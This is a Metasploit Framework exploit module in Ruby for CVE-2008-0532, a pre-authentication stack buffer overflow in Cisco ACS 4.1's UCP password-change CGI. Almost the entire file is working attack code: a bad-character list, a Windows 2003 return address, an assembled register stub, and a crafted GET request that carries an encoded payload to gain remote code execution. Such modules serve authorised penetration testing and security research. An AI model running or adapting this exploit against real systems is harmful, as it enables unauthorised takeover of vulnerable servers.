##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

class MetasploitModule < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Cisco ACS 4.1 with UCP enabled pre-authentication buffer overflow',
			'Description'    => %q{
						This module exploits a stack buffer overflow in CSUserCGI.exe which
					is Cisco's UCP CGI script for allowing users to change their passwords
					through ACS. The CGI /securecgi-bin/CSUserCGI.exe suffers from multiple buffer
					overflows exploitable remotely through the HTTP protocol before authentication.

					ACS/UCP versions prior to 4.2 are affected.
			},
			'Author'  =>
				[
					'Felix FX Lindner', # original discovery, poc
					'Lincoln' # metasploit
				],
			'License'       => MSF_LICENSE,
			'References'    =>
				[
					['CVE', '2008-0532'],
					['URL','http://www.securityfocus.com/archive/1/489463'],
					['http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20080312-ucp']
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'BadChars'  => [*(0x00..0x20)].pack("C*") + [0x2b, 0x3b, 0x7e, 0x7f].pack("C*") + [*(0x80..0xff)].pack("C*"),
					'EncoderOptions' =>
						{
							'BufferRegister' => 'EDX'
						}
				},
			'Platform'       => 'win',
			'Privileged'     => false,
			'Targets'        =>
				[
					# custom p/p/r taking advantage of null from CSUserCGI.exe
					[ 'Windows 2003 SP0 Eng', { 'Ret' => 0x414a7042, }]
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Mar 03 2008'))

		register_options(
			[
				Opt::RPORT(80)
			], self.class )
	end

	def exploit

	stub_asm = %Q|
	push esi
	pop edx
|

	stub = Metasm::Shellcode.assemble(Metasm::Ia32.new, stub_asm).encode_string

		buffer = "\x7a\x7c"
		buffer << rand_text_alpha(92)
		buffer << [target.ret].pack('V')
		buffer << "+"  #act as null
		buffer << rand_text_alpha(27)
		buffer << stub
		buffer << "\x66\x81\xc2\xac"
		buffer << "+"  #act as null
		buffer << "\xeb\x24"
		buffer << rand_text_alpha(36)
		buffer << payload.encoded

		print_status("Sending HTTP request")
		send_request_cgi({
			'uri' => '/securecgi-bin/CSUserCGI.exe?Logout+' + buffer,
			'method' => 'GET'
			}, 25)

		disconnect
		handler
	end
end
